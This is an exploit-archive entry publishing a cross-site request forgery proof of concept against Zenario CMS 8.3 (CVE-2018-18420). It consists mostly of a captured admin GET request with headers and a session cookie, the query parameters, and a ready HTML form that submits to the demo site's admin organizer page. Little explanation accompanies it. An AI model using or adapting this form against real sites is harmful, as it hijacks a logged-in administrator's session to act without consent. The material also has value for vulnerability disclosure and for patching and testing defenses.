Zenar Content Management System 8.3 Cross Site Request Forgery

Zenar Content Management System 8.3 Cross Site Request Forgery: Posted Oct 18, 2018; Authored by Ismail Tasdelen; Zenar Content Management System version 8.3 suffers from a cross site request forgery vulnerability.; tags | exploit, csrf; advisories | CVE-2018-18420; SHA-256 | 11b891dae78b89a0b0de8d65ae192050226dafd5b589b7fe2566a673e8dea795; Download | Favorite | View

Zenar Content Management System 8.3 Cross Site Request Forgery

# Exploit Title: Zenar Content Management System 8.3 - Cross-Site Request Forgery ( CSRF )
# Date: 2018-05-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://zenar.io/
# Software Link : https://github.com/TribalSystems/Zenario/releases/tag/8.3.47997
# Software : Zenar Content Management System 8.3
# Version : 8.3
# Vulernability Type : Web Application
# Vulenrability : Cross-Site Request Forgery ( CSRF )
# CVE : CVE-2018-18420

# Cross-Site Request Forgery (CSRF) vulnerability was discovered in
# the 8.3 version of Zenar Content Management System via the
# admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent URI.

# POC :

# GET Request :

Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0
Request Method: GET
Status Code: 200 OK
Remote Address: 213.146.173.88:80
Referrer Policy: no-referrer-when-downgrade
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
Host: demo.zenar.io
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
X-Requested-With: XMLHttpRequest

# Query String Parametres :

path: zenario__content/panels/content
skinId: 
refinerId: html
refinerName: content_type
refiner__content_type: html
_limit: 50
_start: 0
_item: html_10
_sort_col: first_created_datetime
_sort_desc: 0

# CSRF HTML :

<html><head>
<title> Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) </title>
</head><body>
<form action="http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__content/panels/content/refiners/content_type//html//html_" method="GET">
<input type="text" name="html_" value="10" /><br />
<input type='submit' value='Go!' />
</form>
</body></html>

# You want to follow my activity ?

https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Zenar Content Management System 8.3 Cross Site Request Forgery

Zenar Content Management System 8.3 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Zenar Content Management System 8.3 Cross Site Request Forgery

Share This

Zenar Content Management System 8.3 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems